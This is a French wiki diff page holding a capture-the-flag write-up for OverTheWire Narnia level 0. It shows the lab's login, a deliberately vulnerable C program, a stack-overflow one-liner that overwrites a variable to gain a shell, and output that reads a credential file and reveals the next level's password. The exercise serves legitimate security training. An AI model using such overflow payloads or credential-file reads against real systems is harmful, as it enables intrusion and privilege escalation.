Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.
— |
overthewire_narnia:level0 [2017/04/09 15:33] (Version actuelle) |
||
---|---|---|---|
Ligne 1: | Ligne 1: | ||
+ | ====== Level 0 ====== | ||
+ | <code> | ||
+ | ssh narnia0@narnia.labs.overthewire.org | ||
+ | pass : narnia0 | ||
+ | </code> | ||
+ | |||
+ | <code C> | ||
+ | #include <stdio.h> | ||
+ | #include <stdlib.h> | ||
+ | |||
+ | int main(){ | ||
+ | long val=0x41414141; | ||
+ | char buf[20]; | ||
+ | |||
+ | printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n"); | ||
+ | printf("Here is your chance: "); | ||
+ | scanf("%24s",&buf); | ||
+ | |||
+ | printf("buf: %s\n",buf); | ||
+ | printf("val: 0x%08x\n",val); | ||
+ | |||
+ | if(val==0xdeadbeef) | ||
+ | system("/bin/sh"); | ||
+ | else { | ||
+ | printf("WAY OFF!!!!\n"); | ||
+ | exit(1); | ||
+ | } | ||
+ | |||
+ | return 0; | ||
+ | } | ||
+ | </code> | ||
+ | |||
+ | Niveau relativement basique, il suffit d'écrire ''0xdeadbeef'' dans la variable ''val''. | ||
+ | |||
+ | <code> | ||
+ | $ (python -c 'print "A"*20+"\xef\xbe\xad\xde"'; cat) | ./narnia0 | ||
+ | Correct val's value from 0x41414141 -> 0xdeadbeef! | ||
+ | Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ? | ||
+ | val: 0xdeadbeef | ||
+ | id | ||
+ | uid=14000(narnia0) gid=14000(narnia0) euid=14001(narnia1) groups=14001(narnia1),14000(narnia0) | ||
+ | cat /etc/narnia_pass/narnia1 | ||
+ | efeidiedae | ||
+ | </code> |